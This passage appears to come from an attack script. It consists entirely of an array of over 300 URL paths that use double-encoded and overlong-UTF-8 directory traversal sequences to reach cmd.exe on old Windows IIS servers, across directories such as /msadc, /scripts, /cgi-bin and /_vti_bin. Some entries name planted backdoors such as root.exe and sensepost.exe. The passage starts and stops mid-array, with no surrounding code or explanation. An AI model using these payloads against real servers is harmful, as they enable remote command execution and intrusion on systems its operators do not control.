"/MSADC/..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[46] = "/MSADC/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+"; $U[47] = "/MSADC/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+"; $U[48] = "/MSADC/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+"; $U[49] = "/MSADC/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+"; $U[50] = "/MSADC/..%c1%1c..%c1%1c..%c1%1c..%Cc1%1cwinnt/system32/cmd.exe?/c+"; $U[51] = "/MSADC/..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+"; $U[52] = "/MSADC/..%c0%9v../winnt/system32/cmd.exe?/c+"; $U[53] = "/MSADC/..%c0%af../winnt/system32/cmd.exe?/c+"; $U[54] = "/MSADC/..%c0%qf../winnt/system32/cmd.exe?/c+"; $U[55] = "/MSADC/..%c1%1c../winnt/system32/cmd.exe?/c+"; $U[56] = "/MSADC/..%c1%8s../winnt/system32/cmd.exe?/c+"; $U[57] = "/MSADC/..%c1%9c../winnt/system32/cmd.exe?/c+"; $U[58] = "/MSADC/..%c1%af../winnt/system32/cmd.exe?/c+"; $U[59] = "/MSADC/..%c1%pc../winnt/system32/cmd.exe?/c+"; $U[60] = "/MSADC/..%e0%80%af../winnt/system32/cmd.exe?/c+"; $U[61] = "/MSADC/..%f0%80%80%af../winnt/system32/cmd.exe?/c+"; $U[62] = "/MSADC/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[63] = "/MSADC/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[64] = "/MSADC/root.exe?/c+"; $U[65] = "/MSADC/cmd.exe?/c+"; $U[66] = "/MSADC/sensepost.exe?/c+"; $U[67] = "/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+"; $U[68] = "/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+"; $U[69] = "/MSADC/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[70] = "/MSADC/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+"; $U[71] = "/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+"; $U[72] = "/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+"; $U[73] = "/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+"; $U[74] = "/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+"; $U[75] = "/msadc..%c1%9c../winnt/system32/cmd.exe?/c+"; $U[76] = "/msadc/.%252e/.%252e/winnt/system32/cmd.exe?/c+"; $U[77] = "/msadc/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+"; $U[78] = "/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[79] = "/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+"; $U[80] = "/msadc/..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[81] = "/msadc/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+"; $U[82] = "/msadc/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+"; $U[83] = "/msadc/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+"; $U[84] = "/msadc/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+"; $U[85] = "/msadc/..%c1%1c..%c1%1c..%c1%1c..%Cc1%1cwinnt/system32/cmd.exe?/c+"; $U[86] = "/msadc/..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+"; $U[87] = "/msadc/..%c0%9v../winnt/system32/cmd.exe?/c+"; $U[88] = "/msadc/..%c0%af../winnt/system32/cmd.exe?/c+"; $U[89] = "/msadc/..%c0%qf../winnt/system32/cmd.exe?/c+"; $U[90] = "/msadc/..%c1%1c../winnt/system32/cmd.exe?/c+"; $U[91] = "/msadc/..%c1%8s../winnt/system32/cmd.exe?/c+"; $U[92] = "/msadc/..%c1%9c../winnt/system32/cmd.exe?/c+"; $U[93] = "/msadc/..%c1%af../winnt/system32/cmd.exe?/c+"; $U[94] = "/msadc/..%c1%pc../winnt/system32/cmd.exe?/c+"; $U[95] = "/msadc/..%e0%80%af../winnt/system32/cmd.exe?/c+"; $U[96] = "/msadc/..%f0%80%80%af../winnt/system32/cmd.exe?/c+"; $U[97] = "/msadc/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[98] = "/msadc/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[99] = "/msadc/root.exe?/c+"; $U[100] = "/msadc/cmd.exe?/c+"; $U[101] = "/msadc/sensepost.exe?/c+"; $U[102] = "/msadc/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+"; $U[103] = "/msadc/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+"; $U[104] = "/msadc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[105] = "/msadc/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+"; $U[106] = "/scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+"; $U[107] = "/scripts/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+"; $U[108] = "/scripts/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+"; $U[109] = "/scripts/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+"; $U[110] = "/scripts..%c1%9c../winnt/system32/cmd.exe?/c+"; $U[111] = "/scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+"; $U[112] = "/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+"; $U[113] = "/scripts/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[114] = "/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+"; $U[115] = "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[116] = "/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+"; $U[117] = "/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+"; $U[118] = "/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+"; $U[119] = "/scripts/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+"; $U[120] = "/scripts/..%c1%1c..%c1%1c..%c1%1c..%Cc1%1cwinnt/system32/cmd.exe?/c+"; $U[121] = "/scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+"; $U[122] = "/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+"; $U[123] = "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+"; $U[124] = "/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+"; $U[125] = "/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+"; $U[126] = "/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+"; $U[127] = "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+"; $U[128] = "/scripts/..%c1%af../winnt/system32/cmd.exe?/c+"; $U[129] = "/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+"; $U[130] = "/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+"; $U[131] = "/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+"; $U[132] = "/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[133] = "/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[134] = "/scripts/root.exe?/c+"; $U[135] = "/scripts/cmd.exe?/c+"; $U[136] = "/scripts/sensepost.exe?/c+"; $U[137] = "/scripts/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+"; $U[138] = "/scripts/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+"; $U[139] = "/scripts/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[140] = "/scripts/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+"; $U[141] = "/PBServer/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+"; $U[142] = "/PBServer/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+"; $U[143] = "/PBServer/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+"; $U[144] = "/PBServer/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+"; $U[145] = "/PBServer..%c1%9c../winnt/system32/cmd.exe?/c+"; $U[146] = "/PBServer/.%252e/.%252e/winnt/system32/cmd.exe?/c+"; $U[147] = "/PBServer/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+"; $U[148] = "/PBServer/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[149] = "/PBServer/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+"; $U[150] = "/PBServer/..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[151] = "/PBServer/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+"; $U[152] = "/PBServer/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+"; $U[153] = "/PBServer/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+"; $U[154] = "/PBServer/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+"; $U[155] = "/PBServer/..%c1%1c..%c1%1c..%c1%1c..%Cc1%1cwinnt/system32/cmd.exe?/c+"; $U[156] = "/PBServer/..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+"; $U[157] = "/PBServer/..%c0%9v../winnt/system32/cmd.exe?/c+"; $U[158] = "/PBServer/..%c0%af../winnt/system32/cmd.exe?/c+"; $U[159] = "/PBServer/..%c0%qf../winnt/system32/cmd.exe?/c+"; $U[160] = "/PBServer/..%c1%1c../winnt/system32/cmd.exe?/c+"; $U[161] = "/PBServer/..%c1%8s../winnt/system32/cmd.exe?/c+"; $U[162] = "/PBServer/..%c1%9c../winnt/system32/cmd.exe?/c+"; $U[163] = "/PBServer/..%c1%af../winnt/system32/cmd.exe?/c+"; $U[164] = "/PBServer/..%c1%pc../winnt/system32/cmd.exe?/c+"; $U[165] = "/PBServer/..%e0%80%af../winnt/system32/cmd.exe?/c+"; $U[166] = "/PBServer/..%f0%80%80%af../winnt/system32/cmd.exe?/c+"; $U[167] = "/PBServer/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[168] = "/PBServer/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[169] = "/PBServer/root.exe?/c+"; $U[170] = "/PBServer/cmd.exe?/c+"; $U[171] = "/PBServer/sensepost.exe?/c+"; $U[172] = "/PBServer/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+"; $U[173] = "/PBServer/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+"; $U[174] = "/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[175] = "/PBServer/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+"; $U[176] = "/Rpc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+"; $U[177] = "/Rpc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+"; $U[178] = "/Rpc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+"; $U[179] = "/Rpc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+"; $U[180] = "/Rpc..%c1%9c../winnt/system32/cmd.exe?/c+"; $U[181] = "/Rpc/.%252e/.%252e/winnt/system32/cmd.exe?/c+"; $U[182] = "/Rpc/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+"; $U[183] = "/Rpc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[184] = "/Rpc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+"; $U[185] = "/Rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[186] = "/Rpc/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+"; $U[187] = "/Rpc/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+"; $U[188] = "/Rpc/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+"; $U[189] = "/Rpc/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+"; $U[190] = "/Rpc/..%c1%1c..%c1%1c..%c1%1c..%Cc1%1cwinnt/system32/cmd.exe?/c+"; $U[191] = "/Rpc/..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+"; $U[192] = "/Rpc/..%c0%9v../winnt/system32/cmd.exe?/c+"; $U[193] = "/Rpc/..%c0%af../winnt/system32/cmd.exe?/c+"; $U[194] = "/Rpc/..%c0%qf../winnt/system32/cmd.exe?/c+"; $U[195] = "/Rpc/..%c1%1c../winnt/system32/cmd.exe?/c+"; $U[196] = "/Rpc/..%c1%8s../winnt/system32/cmd.exe?/c+"; $U[197] = "/Rpc/..%c1%9c../winnt/system32/cmd.exe?/c+"; $U[198] = "/Rpc/..%c1%af../winnt/system32/cmd.exe?/c+"; $U[199] = "/Rpc/..%c1%pc../winnt/system32/cmd.exe?/c+"; $U[200] = "/Rpc/..%e0%80%af../winnt/system32/cmd.exe?/c+"; $U[201] = "/Rpc/..%f0%80%80%af../winnt/system32/cmd.exe?/c+"; $U[202] = "/Rpc/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[203] = "/Rpc/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[204] = "/Rpc/root.exe?/c+"; $U[205] = "/Rpc/cmd.exe?/c+"; $U[206] = "/Rpc/sensepost.exe?/c+"; $U[207] = "/Rpc/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+"; $U[208] = "/Rpc/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+"; $U[209] = "/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[210] = "/Rpc/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+"; $U[211] = "/samples/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+"; $U[212] = "/samples/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+"; $U[213] = "/samples/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+"; $U[214] = "/samples/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+"; $U[215] = "/samples..%c1%9c../winnt/system32/cmd.exe?/c+"; $U[216] = "/samples/.%252e/.%252e/winnt/system32/cmd.exe?/c+"; $U[217] = "/samples/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+"; $U[218] = "/samples/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[219] = "/samples/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+"; $U[220] = "/samples/..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[221] = "/samples/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+"; $U[222] = "/samples/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+"; $U[223] = "/samples/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+"; $U[224] = "/samples/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+"; $U[225] = "/samples/..%c1%1c..%c1%1c..%c1%1c..%Cc1%1cwinnt/system32/cmd.exe?/c+"; $U[226] = "/samples/..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+"; $U[227] = "/samples/..%c0%9v../winnt/system32/cmd.exe?/c+"; $U[228] = "/samples/..%c0%af../winnt/system32/cmd.exe?/c+"; $U[229] = "/samples/..%c0%qf../winnt/system32/cmd.exe?/c+"; $U[230] = "/samples/..%c1%1c../winnt/system32/cmd.exe?/c+"; $U[231] = "/samples/..%c1%8s../winnt/system32/cmd.exe?/c+"; $U[232] = "/samples/..%c1%9c../winnt/system32/cmd.exe?/c+"; $U[233] = "/samples/..%c1%af../winnt/system32/cmd.exe?/c+"; $U[234] = "/samples/..%c1%pc../winnt/system32/cmd.exe?/c+"; $U[235] = "/samples/..%e0%80%af../winnt/system32/cmd.exe?/c+"; $U[236] = "/samples/..%f0%80%80%af../winnt/system32/cmd.exe?/c+"; $U[237] = "/samples/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[238] = "/samples/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[239] = "/samples/root.exe?/c+"; $U[240] = "/samples/cmd.exe?/c+"; $U[241] = "/samples/sensepost.exe?/c+"; $U[242] = "/samples/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+"; $U[243] = "/samples/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+"; $U[244] = "/samples/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[245] = "/samples/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+"; $U[246] = "/_vti_bin/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+"; $U[247] = "/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+"; $U[248] = "/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+"; $U[249] = "/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+"; $U[250] = "/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[251] = "/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+"; $U[252] = "/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+"; $U[253] = "/_vti_bin/..%c0%af../..%c0%1f../..%c0%af../winnt/system32/cmd.exe?/c+"; $U[254] = "/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+"; $U[255] = "/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[256] = "/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+"; $U[257] = "/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[258] = "/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+"; $U[259] = "/cgi-bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+"; $U[260] = "/cgi-bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+"; $U[261] = "/cgi-bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+"; $U[262] = "/cgi-bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+"; $U[263] = "/cgi-bin..%c1%9c../winnt/system32/cmd.exe?/c+"; $U[264] = "/cgi-bin/.%252e/.%252e/winnt/system32/cmd.exe?/c+"; $U[265] = "/cgi-bin/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+"; $U[266] = "/cgi-bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[267] = "/cgi-bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+"; $U[268] = "/cgi-bin/..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[269] = "/cgi-bin/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+"; $U[270] = "/cgi-bin/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+"; $U[271] = "/cgi-bin/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+"; $U[272] = "/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+"; $U[273] = "/cgi-bin/..%c1%1c..%c1%1c..%c1%1c..%Cc1%1cwinnt/system32/cmd.exe?/c+"; $U[274] = "/cgi-bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+"; $U[275] = "/cgi-bin/..%c0%9v../winnt/system32/cmd.exe?/c+"; $U[276] = "/cgi-bin/..%c0%af../winnt/system32/cmd.exe?/c+"; $U[277] = "/cgi-bin/..%c0%qf../winnt/system32/cmd.exe?/c+"; $U[278] = "/cgi-bin/..%c1%1c../winnt/system32/cmd.exe?/c+"; $U[279] = "/cgi-bin/..%c1%8s../winnt/system32/cmd.exe?/c+"; $U[280] = "/cgi-bin/..%c1%9c../winnt/system32/cmd.exe?/c+"; $U[281] = "/cgi-bin/..%c1%af../winnt/system32/cmd.exe?/c+"; $U[282] = "/cgi-bin/..%c1%pc../winnt/system32/cmd.exe?/c+"; $U[283] = "/cgi-bin/..%e0%80%af../winnt/system32/cmd.exe?/c+"; $U[284] = "/cgi-bin/..%f0%80%80%af../winnt/system32/cmd.exe?/c+"; $U[285] = "/cgi-bin/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[286] = "/cgi-bin/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[287] = "/cgi-bin/root.exe?/c+"; $U[288] = "/cgi-bin/cmd.exe?/c+"; $U[289] = "/cgi-bin/sensepost.exe?/c+"; $U[290] = "/cgi-bin/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+"; $U[291] = "/cgi-bin/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+"; $U[292] = "/cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[293] = "/cgi-bin/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+"; $U[294] = "/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[295] = "/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+"; $U[296] = "/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+"; $U[297] = "/iisadmpwd/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[298] = "/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+"; $U[299] = "/iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+"; $U[300] = "/includes/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[301] = "/msadc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+"; $U[302] = "/msadc/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+"; $U[303] = "/msadc/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+"; $U[304] = "/msadc/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+"; $U[305] = "/msadc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+"; $U[306] = "/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+"; $U[307] = "/msadc/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[308] = "/msadc/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[309] = "/_mem_bin/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+"; $U[310] = "/_mem_bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+"; $U[311] = "/_mem_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+"; $U[312] = "/_mem_bin/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+"; $U[313] = "/_mem_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+"; $U[314] = "/_vti_bin/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+"; $U[315] = "/msadc/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+"; $U[316] = "/msadc/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+"; $U[317] = "/msadc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+"; $U[318] = "/msadc/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+"; $U[319] = "/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+"; $U[320] = "/msadc/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+"; $U[321] = "/msadc/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+"; $U[322] = "/msadc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+"; $U[323] = "/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+"; $U[324] = "/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt./system32/cmd.exe?/c+"; $U[325] = "/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+"; $U[326] = "/msadc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+"; $U[327] = "/msadc/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+"; $U[328] = "/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+"; $U[329] = "/msadc/..%c1%8s../..%c1%8s../..%c1%8s../winnt/system32/cmd.exe?/c+"; $U[330] = "/msadc/..%c1%8s../winnt/system32/cmd.exe?/c+"; $U[331] = "/msadc/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+"; $U[332] = "/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+"; $U[333] = "/msadc/..%c1%9c../winnt/system32/cmd.exe?/c+"; $U[334] = "/msadc/..%c1%9c/winnt/system32/cmd.exe?/c+"; $U[335] = "/msadc/..%c1%af../..%c1%af../..%c1%af../winnt/system32/cmd.exe?/c+"; $U[336] = "/msadc/..%c1%af../winnt/system32/cmd.exe?/c+"; $U[337] = "/msadc/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+"; $U[338] = "/msadc/..%c1%pc../winnt/system32/cmd.exe?/c+"; $U[339] = "/msadc/..%e0%80%af../winnt/system32/cmd.exe?/c+"; $U[340] = "/msadc/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+"; $U[341] = "/msadc/..%f0%80%80%af../winnt/system32/cmd.exe?/c+"; $U[342] = "/msadc/..%f8%80%80%80%af../..%f8%80%80%80%af../..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[343] = "/msadc/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[344] = "/msadc/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[345] = "/msadc/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[346] = "/msadc/..%u0025%u005c..%u0025%u005cwinnt/system32/cmd.exe?/c+"; $U[347] = "/msadc/..%u00255c..%u005cwinnt/system32/cmd.exe?/c+"; $U[348] = "/msadc/..%u002e..%u002e/winnt/system32/cmd.exe?/c+"; $U[349] = "/msadc/..%u002f..%u002fwinnt/system32/cmd.exe?/c+"; $U[350] = "/msadc/..%u005c..%u005cwinnt/system32/cmd.exe?/c+"; $U[351] = "/_mem_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+"; $U[352] = "/_mem_bin/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+"; $U[353] = "/_mem_bin/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+"; $U[354] = "/_mem_bin/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+"; $U[355] = "/_mem_bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+"; $U[356] = "/_mem_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?./c+"; $U[357] = 